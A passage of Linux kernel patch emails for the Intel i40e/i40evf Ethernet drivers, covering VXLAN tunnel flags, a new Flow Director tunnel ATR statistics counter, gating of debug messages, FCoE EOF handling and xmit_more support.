l4_hdr = this_ip_hdr->protocol; /* the stack computes the IP header already, the only time we * need the hardware to recompute it is in the case of TSO. */ - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV4_CSUM; this_ip_hdr->check = 0; } else { @@ -2296,7 +2307,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, /* Now set the td_offset for IP header length */ *td_offset = (network_hdr_len >> 2) << I40E_TX_DESC_LENGTH_IPLEN_SHIFT; - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { l4_hdr = this_ipv6_hdr->nexthdr; *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV6; /* Now set the td_offset for IP header length */ @@ -2709,7 +2720,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, else if (protocol == htons(ETH_P_IPV6)) tx_flags |= I40E_TX_FLAGS_IPV6; - tso = i40e_tso(tx_ring, skb, tx_flags, protocol, &hdr_len, + tso = i40e_tso(tx_ring, skb, &hdr_len, &cd_type_cmd_tso_mss, &cd_tunneling); if (tso < 0) @@ -2735,7 +2746,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, if (skb->ip_summed == CHECKSUM_PARTIAL) { tx_flags |= I40E_TX_FLAGS_CSUM; - i40e_tx_enable_csum(skb, tx_flags, &td_cmd, &td_offset, + i40e_tx_enable_csum(skb, &tx_flags, &td_cmd, &td_offset, tx_ring, &cd_tunneling); } diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.h b/drivers/net/ethernet/intel/i40e/i40e_txrx.h index 4b0b8102cdc3..ea1df3b48747 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.h @@ -139,6 +139,7 @@ enum i40e_dyn_idx_t { #define I40E_TX_FLAGS_FSO (u32)(1 << 7) #define I40E_TX_FLAGS_TSYN (u32)(1 << 8) #define I40E_TX_FLAGS_FD_SB (u32)(1 << 9) +#define I40E_TX_FLAGS_VXLAN_TUNNEL (u32)(1 << 10) #define I40E_TX_FLAGS_VLAN_MASK 0xffff0000 #define I40E_TX_FLAGS_VLAN_PRIO_MASK 0xe0000000 #define I40E_TX_FLAGS_VLAN_PRIO_SHIFT 29 diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 3ef23091439f..09cc2d750a81 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1406,16 +1406,14 @@ static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, * i40e_tso - set up the tso context descriptor * @tx_ring: ptr to the ring to send * @skb: ptr to the skb we're sending - * @tx_flags: the collected send information - * @protocol: the send protocol * @hdr_len: ptr to the size of the packet header * @cd_tunneling: ptr to context descriptor bits * * Returns 0 if no TSO can happen, 1 if tso is going, or error **/ static int i40e_tso(struct i40e_ring *tx_ring, struct sk_buff *skb, - u32 tx_flags, __be16 protocol, u8 *hdr_len, - u64 *cd_type_cmd_tso_mss, u32 *cd_tunneling) + u8 *hdr_len, u64 *cd_type_cmd_tso_mss, + u32 *cd_tunneling) { u32 cd_cmd, cd_tso_len, cd_mss; struct ipv6hdr *ipv6h; @@ -1466,12 +1464,12 @@ static int i40e_tso(struct i40e_ring *tx_ring, struct sk_buff *skb, /** * i40e_tx_enable_csum - Enable Tx checksum offloads * @skb: send buffer - * @tx_flags: Tx flags currently set + * @tx_flags: pointer to Tx flags currently set * @td_cmd: Tx descriptor command bits to set * @td_offset: Tx descriptor header offsets to set * @cd_tunneling: ptr to context desc bits **/ -static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, +static void i40e_tx_enable_csum(struct sk_buff *skb, u32 *tx_flags, u32 *td_cmd, u32 *td_offset, struct i40e_ring *tx_ring, u32 *cd_tunneling) @@ -1487,6 +1485,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, switch (ip_hdr(skb)->protocol) { case IPPROTO_UDP: l4_tunnel = I40E_TXD_CTX_UDP_TUNNELING; + *tx_flags |= I40E_TX_FLAGS_VXLAN_TUNNEL; break; default: return; @@ -1496,18 +1495,17 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, this_ipv6_hdr = inner_ipv6_hdr(skb); this_tcp_hdrlen = inner_tcp_hdrlen(skb); - if (tx_flags & I40E_TX_FLAGS_IPV4) { - - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4; ip_hdr(skb)->check = 0; } else { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4_NO_CSUM; } - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV6; - if (tx_flags & I40E_TX_FLAGS_TSO) + if (*tx_flags & I40E_TX_FLAGS_TSO) ip_hdr(skb)->check = 0; } @@ -1519,8 +1517,8 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, skb_transport_offset(skb)) >> 1) << I40E_TXD_CTX_QW0_NATLEN_SHIFT; if (this_ip_hdr->version == 6) { - tx_flags &= ~I40E_TX_FLAGS_IPV4; - tx_flags |= I40E_TX_FLAGS_IPV6; + *tx_flags &= ~I40E_TX_FLAGS_IPV4; + *tx_flags |= I40E_TX_FLAGS_IPV6; } @@ -1532,12 +1530,12 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, } /* Enable IP checksum offloads */ - if (tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { l4_hdr = this_ip_hdr->protocol; /* the stack computes the IP header already, the only time we * need the hardware to recompute it is in the case of TSO. */ - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV4_CSUM; this_ip_hdr->check = 0; } else { @@ -1546,7 +1544,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, /* Now set the td_offset for IP header length */ *td_offset = (network_hdr_len >> 2) << I40E_TX_DESC_LENGTH_IPLEN_SHIFT; - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { l4_hdr = this_ipv6_hdr->nexthdr; *td_cmd |= I40E_TX_DESC_CMD_IIPT_IPV6; /* Now set the td_offset for IP header length */ @@ -1940,7 +1938,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, else if (protocol == htons(ETH_P_IPV6)) tx_flags |= I40E_TX_FLAGS_IPV6; - tso = i40e_tso(tx_ring, skb, tx_flags, protocol, &hdr_len, + tso = i40e_tso(tx_ring, skb, &hdr_len, &cd_type_cmd_tso_mss, &cd_tunneling); if (tso < 0) @@ -1961,7 +1959,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, if (skb->ip_summed == CHECKSUM_PARTIAL) { tx_flags |= I40E_TX_FLAGS_CSUM; - i40e_tx_enable_csum(skb, tx_flags, &td_cmd, &td_offset, + i40e_tx_enable_csum(skb, &tx_flags, &td_cmd, &td_offset, tx_ring, &cd_tunneling); } diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h index 1e49bb1fbac1..a23f5e862f06 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h @@ -138,6 +138,7 @@ enum i40e_dyn_idx_t { #define I40E_TX_FLAGS_FCCRC (u32)(1 << 6) #define I40E_TX_FLAGS_FSO (u32)(1 << 7) #define I40E_TX_FLAGS_FD_SB (u32)(1 << 9) +#define I40E_TX_FLAGS_VXLAN_TUNNEL (u32)(1 << 10) #define I40E_TX_FLAGS_VLAN_MASK 0xffff0000 #define I40E_TX_FLAGS_VLAN_PRIO_MASK 0xe0000000 #define I40E_TX_FLAGS_VLAN_PRIO_SHIFT 29 From 60ccd45cbabdc058061b860c43c48877558cc176 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:01 -0400 Subject: [PATCH 399/872] i40e/i40evf: Add stats to count Tunnel ATR hits Add a 3rd dynamic filter counter to track Tunneled ATR hits separately. Ethtool port stat "fdir_atr_tunnel_match" Change-ID: Idd978b6db2a462b5722397cd2ffd04ef055f8655 Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e.h | 3 +++ drivers/net/ethernet/intel/i40e/i40e_ethtool.c | 1 + drivers/net/ethernet/intel/i40e/i40e_main.c | 4 ++++ drivers/net/ethernet/intel/i40e/i40e_txrx.c | 13 ++++++++++--- drivers/net/ethernet/intel/i40e/i40e_type.h | 1 + drivers/net/ethernet/intel/i40evf/i40e_type.h | 1 + 6 files changed, 20 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h index 33c35d3b7420..0bfa5a05fab1 100644 --- a/drivers/net/ethernet/intel/i40e/i40e.h +++ b/drivers/net/ethernet/intel/i40e/i40e.h @@ -182,6 +182,7 @@ struct i40e_lump_tracking { enum i40e_fd_stat_idx { I40E_FD_STAT_ATR, I40E_FD_STAT_SB, + I40E_FD_STAT_ATR_TUNNEL, I40E_FD_STAT_PF_COUNT }; #define I40E_FD_STAT_PF_IDX(pf_id) ((pf_id) * I40E_FD_STAT_PF_COUNT) @@ -189,6 +190,8 @@ enum i40e_fd_stat_idx { (I40E_FD_STAT_PF_IDX(pf_id) + I40E_FD_STAT_ATR) #define I40E_FD_SB_STAT_IDX(pf_id) \ (I40E_FD_STAT_PF_IDX(pf_id) + I40E_FD_STAT_SB) +#define I40E_FD_ATR_TUNNEL_STAT_IDX(pf_id) \ + (I40E_FD_STAT_PF_IDX(pf_id) + I40E_FD_STAT_ATR_TUNNEL) struct i40e_fdir_filter { struct hlist_node fdir_node; diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c index e77b6bddd90e..c568c901453e 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c +++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c @@ -147,6 +147,7 @@ static struct i40e_stats i40e_gstrings_stats[] = { I40E_PF_STAT("rx_hwtstamp_cleared", rx_hwtstamp_cleared), I40E_PF_STAT("fdir_flush_cnt", fd_flush_cnt), I40E_PF_STAT("fdir_atr_match", stats.fd_atr_match), + I40E_PF_STAT("fdir_atr_tunnel_match", stats.fd_atr_tunnel_match), I40E_PF_STAT("fdir_sb_match", stats.fd_sb_match), /* LPI stats */ diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index f1a8c4c1e389..e70a616bb658 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -1102,6 +1102,10 @@ static void i40e_update_pf_stats(struct i40e_pf *pf) i40e_stat_update32(hw, I40E_GLQF_PCNT(pf->fd_sb_cnt_idx), pf->stat_offsets_loaded, &osd->fd_sb_match, &nsd->fd_sb_match); + i40e_stat_update32(hw, + I40E_GLQF_PCNT(I40E_FD_ATR_TUNNEL_STAT_IDX(pf->hw.pf_id)), + pf->stat_offsets_loaded, + &osd->fd_atr_tunnel_match, &nsd->fd_atr_tunnel_match); val = rd32(hw, I40E_PRTPM_EEE_STAT); nsd->tx_lpi_status = diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 8565495b8680..fc4ec82caf1f 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -2033,9 +2033,16 @@ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, I40E_TXD_FLTR_QW1_FD_STATUS_SHIFT; dtype_cmd |= I40E_TXD_FLTR_QW1_CNT_ENA_MASK; - dtype_cmd |= - ((u32)pf->fd_atr_cnt_idx << I40E_TXD_FLTR_QW1_CNTINDEX_SHIFT) & - I40E_TXD_FLTR_QW1_CNTINDEX_MASK; + if (!(tx_flags & I40E_TX_FLAGS_VXLAN_TUNNEL)) + dtype_cmd |= + ((u32)I40E_FD_ATR_STAT_IDX(pf->hw.pf_id) << + I40E_TXD_FLTR_QW1_CNTINDEX_SHIFT) & + I40E_TXD_FLTR_QW1_CNTINDEX_MASK; + else + dtype_cmd |= + ((u32)I40E_FD_ATR_TUNNEL_STAT_IDX(pf->hw.pf_id) << + I40E_TXD_FLTR_QW1_CNTINDEX_SHIFT) & + I40E_TXD_FLTR_QW1_CNTINDEX_MASK; fdir_desc->qindex_flex_ptype_vsi = cpu_to_le32(flex_ptype); fdir_desc->rsvd = cpu_to_le32(0); diff --git a/drivers/net/ethernet/intel/i40e/i40e_type.h b/drivers/net/ethernet/intel/i40e/i40e_type.h index 568e855da0f3..9a5a75b1e2bc 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_type.h +++ b/drivers/net/ethernet/intel/i40e/i40e_type.h @@ -1133,6 +1133,7 @@ struct i40e_hw_port_stats { /* flow director stats */ u64 fd_atr_match; u64 fd_sb_match; + u64 fd_atr_tunnel_match; /* EEE LPI */ u32 tx_lpi_status; u32 rx_lpi_status; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_type.h b/drivers/net/ethernet/intel/i40evf/i40e_type.h index ec9d83a93379..c463ec41579c 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_type.h +++ b/drivers/net/ethernet/intel/i40evf/i40e_type.h @@ -1108,6 +1108,7 @@ struct i40e_hw_port_stats { /* flow director stats */ u64 fd_atr_match; u64 fd_sb_match; + u64 fd_atr_tunnel_match; /* EEE LPI */ u32 tx_lpi_status; u32 rx_lpi_status; From 0bf4b1b0c3fda4dd72910cba3c40b3273a2de756 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:02 -0400 Subject: [PATCH 400/872] i40e: Remove unnecessary pf members We can use the stat index macro directly, a variable is not required. Change-ID: I19f08ac16353dc0cd87a1a8248d714e15a54aa8a Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e.h | 2 -- drivers/net/ethernet/intel/i40e/i40e_ethtool.c | 2 +- drivers/net/ethernet/intel/i40e/i40e_main.c | 10 ++++------ 3 files changed, 5 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h index 0bfa5a05fab1..aca9cef50d81 100644 --- a/drivers/net/ethernet/intel/i40e/i40e.h +++ b/drivers/net/ethernet/intel/i40e/i40e.h @@ -266,8 +266,6 @@ struct i40e_pf { struct hlist_head fdir_filter_list; u16 fdir_pf_active_filters; - u16 fd_sb_cnt_idx; - u16 fd_atr_cnt_idx; unsigned long fd_flush_timestamp; u32 fd_flush_cnt; u32 fd_add_err; diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c index c568c901453e..9a68c65b17ea 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c +++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c @@ -2293,7 +2293,7 @@ static int i40e_add_fdir_ethtool(struct i40e_vsi *vsi, input->pctype = 0; input->dest_vsi = vsi->id; input->fd_status = I40E_FILTER_PROGRAM_DESC_FD_STATUS_FD_ID; - input->cnt_index = pf->fd_sb_cnt_idx; + input->cnt_index = I40E_FD_SB_STAT_IDX(pf->hw.pf_id); input->flow_type = fsp->flow_type; input->ip4_proto = fsp->h_u.usr_ip4_spec.proto; diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index e70a616bb658..6f16f56a3f27 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -1096,10 +1096,12 @@ static void i40e_update_pf_stats(struct i40e_pf *pf) &osd->rx_jabber, &nsd->rx_jabber); /* FDIR stats */ - i40e_stat_update32(hw, I40E_GLQF_PCNT(pf->fd_atr_cnt_idx), + i40e_stat_update32(hw, + I40E_GLQF_PCNT(I40E_FD_ATR_STAT_IDX(pf->hw.pf_id)), pf->stat_offsets_loaded, &osd->fd_atr_match, &nsd->fd_atr_match); - i40e_stat_update32(hw, I40E_GLQF_PCNT(pf->fd_sb_cnt_idx), + i40e_stat_update32(hw, + I40E_GLQF_PCNT(I40E_FD_SB_STAT_IDX(pf->hw.pf_id)), pf->stat_offsets_loaded, &osd->fd_sb_match, &nsd->fd_sb_match); i40e_stat_update32(hw, @@ -7679,12 +7681,8 @@ static int i40e_sw_init(struct i40e_pf *pf) (pf->hw.func_caps.fd_filters_best_effort > 0)) { pf->flags |= I40E_FLAG_FD_ATR_ENABLED; pf->atr_sample_rate = I40E_DEFAULT_ATR_SAMPLE_RATE; - /* Setup a counter for fd_atr per PF */ - pf->fd_atr_cnt_idx = I40E_FD_ATR_STAT_IDX(pf->hw.pf_id); if (!(pf->flags & I40E_FLAG_MFP_ENABLED)) { pf->flags |= I40E_FLAG_FD_SB_ENABLED; - /* Setup a counter for fd_sb per PF */ - pf->fd_sb_cnt_idx = I40E_FD_SB_STAT_IDX(pf->hw.pf_id); } else { dev_info(&pf->pdev->dev, "Flow Director Sideband mode Disabled in MFP mode\n"); From 6b02a174c1542486eeaa1de94e6c38e9271b89d8 Mon Sep 17 00:00:00 2001 From: Greg Rose Date: Thu, 16 Apr 2015 20:06:03 -0400 Subject: [PATCH 401/872] i40e/i40evf: Remove unneeded TODO There's no need for a counter so remove the TODO comment. Change-ID: I3321dda04934c4f5fda9b279ab666192bda44214 Signed-off-by: Greg Rose Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 3 --- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 3 --- 2 files changed, 6 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index fc4ec82caf1f..78ab8b5b25aa 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -1653,9 +1653,6 @@ static int i40e_clean_rx_irq_ps(struct i40e_ring *rx_ring, int budget) /* ERR_MASK will only have valid bits if EOP set */ if (unlikely(rx_error & (1 << I40E_RX_DESC_ERROR_RXE_SHIFT))) { dev_kfree_skb_any(skb); - /* TODO: shouldn't we increment a counter indicating the - * drop? - */ continue; } diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 09cc2d750a81..1c79a0801d94 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1128,9 +1128,6 @@ static int i40e_clean_rx_irq_ps(struct i40e_ring *rx_ring, int budget) /* ERR_MASK will only have valid bits if EOP set */ if (unlikely(rx_error & (1 << I40E_RX_DESC_ERROR_RXE_SHIFT))) { dev_kfree_skb_any(skb); - /* TODO: shouldn't we increment a counter indicating the - * drop? - */ continue; } From 41837cad54fe22d29f021f6cb0e9d151acb104a0 Mon Sep 17 00:00:00 2001 From: Vasu Dev Date: Thu, 16 Apr 2015 20:06:05 -0400 Subject: [PATCH 402/872] i40e: fix unrecognized FCOE EOF case Because i40e_fcoe_ctxt_eof should never be called without i40e_fcoe_eof_is_supported being called first, the EOF in fcoe_ctxt_eof should always be valid and therefore we do not need to print an error if it is not valid. However, a WARN ON to easily catch any calls to i40e_fcoe_ctxt_eof that aren't preceded with a call to i40e_fcoe_eof_is_supported is helpful. Change-ID: I3b536b1981ec0bce80576a74440b7dea3908bdb9 Signed-off-by: Vasu Dev Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_fcoe.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_fcoe.c b/drivers/net/ethernet/intel/i40e/i40e_fcoe.c index 1803afeef23e..c8b621e0e7cd 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_fcoe.c +++ b/drivers/net/ethernet/intel/i40e/i40e_fcoe.c @@ -118,7 +118,7 @@ static inline int i40e_fcoe_fc_eof(struct sk_buff *skb, u8 *eof) * * The FC EOF is converted to the value understood by HW for descriptor * programming. Never call this w/o calling i40e_fcoe_eof_is_supported() - * first. + * first and that already checks for all supported valid eof values. **/ static inline u32 i40e_fcoe_ctxt_eof(u8 eof) { @@ -132,9 +132,12 @@ static inline u32 i40e_fcoe_ctxt_eof(u8 eof) case FC_EOF_A: return I40E_TX_DESC_CMD_L4T_EOFT_EOF_A; default: - /* FIXME: still returns 0 */ - pr_err("Unrecognized EOF %x\n", eof); - return 0; + /* Supported valid eof shall be already checked by + * calling i40e_fcoe_eof_is_supported() first, + * therefore this default case shall never hit. + */ + WARN_ON(1); + return -EINVAL; } } From 2e4875e38c288702c2002c7bcf527d8aa0083979 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:06 -0400 Subject: [PATCH 403/872] i40e: Move the FD ATR/SB messages to a higher debug level These are not useful unless SV is happening as there is a FD flush counter that tracks this. Change-ID: If2655b5a29687247d03a51d35f69854bbeb711ce Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 18 ++++++++++++------ drivers/net/ethernet/intel/i40e/i40e_txrx.c | 9 ++++++--- 2 files changed, 18 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index 6f16f56a3f27..d6113e3d76f2 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -4744,7 +4744,8 @@ static int i40e_up_complete(struct i40e_vsi *vsi) pf->fd_add_err = pf->fd_atr_cnt = 0; if (pf->fd_tcp_rule > 0) { pf->flags &= ~I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 exist\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 exist\n"); pf->fd_tcp_rule = 0; } i40e_fdir_filter_restore(vsi); @@ -5433,7 +5434,8 @@ void i40e_fdir_check_and_reenable(struct i40e_pf *pf) if ((pf->flags & I40E_FLAG_FD_SB_ENABLED) && (pf->auto_disable_flags & I40E_FLAG_FD_SB_ENABLED)) { pf->auto_disable_flags &= ~I40E_FLAG_FD_SB_ENABLED; - dev_info(&pf->pdev->dev, "FD Sideband/ntuple is being enabled since we have space in the table now\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "FD Sideband/ntuple is being enabled since we have space in the table now\n"); } } /* Wait for some more space to be available to turn on ATR */ @@ -5441,7 +5443,8 @@ void i40e_fdir_check_and_reenable(struct i40e_pf *pf) if ((pf->flags & I40E_FLAG_FD_ATR_ENABLED) && (pf->auto_disable_flags & I40E_FLAG_FD_ATR_ENABLED)) { pf->auto_disable_flags &= ~I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "ATR is being enabled since we have space in the table now\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR is being enabled since we have space in the table now\n"); } } } @@ -5474,7 +5477,8 @@ static void i40e_fdir_flush_and_replay(struct i40e_pf *pf) if (!(time_after(jiffies, min_flush_time)) && (fd_room < I40E_FDIR_BUFFER_HEAD_ROOM_FOR_ATR)) { - dev_info(&pf->pdev->dev, "ATR disabled, not enough FD filter space.\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR disabled, not enough FD filter space.\n"); disable_atr = true; } @@ -5501,7 +5505,8 @@ static void i40e_fdir_flush_and_replay(struct i40e_pf *pf) if (!disable_atr) pf->flags |= I40E_FLAG_FD_ATR_ENABLED; clear_bit(__I40E_FD_FLUSH_REQUESTED, &pf->state); - dev_info(&pf->pdev->dev, "FD Filter table flushed and FD-SB replayed.\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "FD Filter table flushed and FD-SB replayed.\n"); } } } @@ -7772,7 +7777,8 @@ bool i40e_set_ntuple(struct i40e_pf *pf, netdev_features_t features) pf->fd_add_err = pf->fd_atr_cnt = pf->fd_tcp_rule = 0; pf->fdir_pf_active_filters = 0; pf->flags |= I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "ATR re-enabled.\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR re-enabled.\n"); /* if ATR was auto disabled it can be re-enabled. */ if ((pf->flags & I40E_FLAG_FD_ATR_ENABLED) && (pf->auto_disable_flags & I40E_FLAG_FD_ATR_ENABLED)) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 78ab8b5b25aa..3414e468bb51 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -283,7 +283,8 @@ static int i40e_add_del_fdir_tcpv4(struct i40e_vsi *vsi, if (add) { pf->fd_tcp_rule++; if (pf->flags & I40E_FLAG_FD_ATR_ENABLED) { - dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 flow being applied\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "Forcing ATR off, sideband rules for TCP/IPv4 flow being applied\n"); pf->flags &= ~I40E_FLAG_FD_ATR_ENABLED; } } else { @@ -291,7 +292,8 @@ static int i40e_add_del_fdir_tcpv4(struct i40e_vsi *vsi, (pf->fd_tcp_rule - 1) : 0; if (pf->fd_tcp_rule == 0) { pf->flags |= I40E_FLAG_FD_ATR_ENABLED; - dev_info(&pf->pdev->dev, "ATR re-enabled due to no sideband TCP/IPv4 rules\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_info(&pf->pdev->dev, "ATR re-enabled due to no sideband TCP/IPv4 rules\n"); } } @@ -501,7 +503,8 @@ static void i40e_fd_handle_status(struct i40e_ring *rx_ring, if ((pf->flags & I40E_FLAG_FD_SB_ENABLED) && !(pf->auto_disable_flags & I40E_FLAG_FD_SB_ENABLED)) { - dev_warn(&pdev->dev, "FD filter space full, new ntuple rules will not be added\n"); + if (I40E_DEBUG_FD & pf->hw.debug_mask) + dev_warn(&pdev->dev, "FD filter space full, new ntuple rules will not be added\n"); pf->auto_disable_flags |= I40E_FLAG_FD_SB_ENABLED; } From 8f6a2b05c67d915cef66b2c9636404e0d531def2 Mon Sep 17 00:00:00 2001 From: Jesse Brandeburg Date: Thu, 16 Apr 2015 20:06:09 -0400 Subject: [PATCH 404/872] i40evf: skb->xmit_more support Eric added support for skb->xmit_more in i40e, this ports that into i40evf as well. Support skb->xmit_more in i40evf is straightforward; we need to move around i40e_maybe_stop_tx() call to correctly test netif_xmit_stopped() before taking the decision to not kick the NIC. Change-ID: Idddda6a2e4a7ab335631c91ced51f55b25eb8468 Signed-off-by: Eric Dumazet Signed-off-by: Daniel Borkmann Signed-off-by: Jesse Brandeburg Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 88 ++++++++++--------- 1 file changed, 47 insertions(+), 41 deletions(-) diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 1c79a0801d94..64506631022d 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1669,6 +1669,47 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, return linearize; } +/** + * __i40evf_maybe_stop_tx - 2nd level check for tx stop conditions + * @tx_ring: the ring to be checked + * @size: the size buffer we want to assure is available + * + * Returns -EBUSY if a stop is needed, else 0 + **/ +static inline int __i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +{ + netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); + /* Memory barrier before checking head and tail */ + smp_mb(); + + /* Check again in a case another CPU has just made room available. */ + if (likely(I40E_DESC_UNUSED(tx_ring) < size)) + return -EBUSY; + + /* A reprieve! - use start_queue because it doesn't call schedule */ + netif_start_subqueue(tx_ring->netdev, tx_ring->queue_index); + ++tx_ring->tx_stats.restart_queue; + return 0; +} + +/** + * 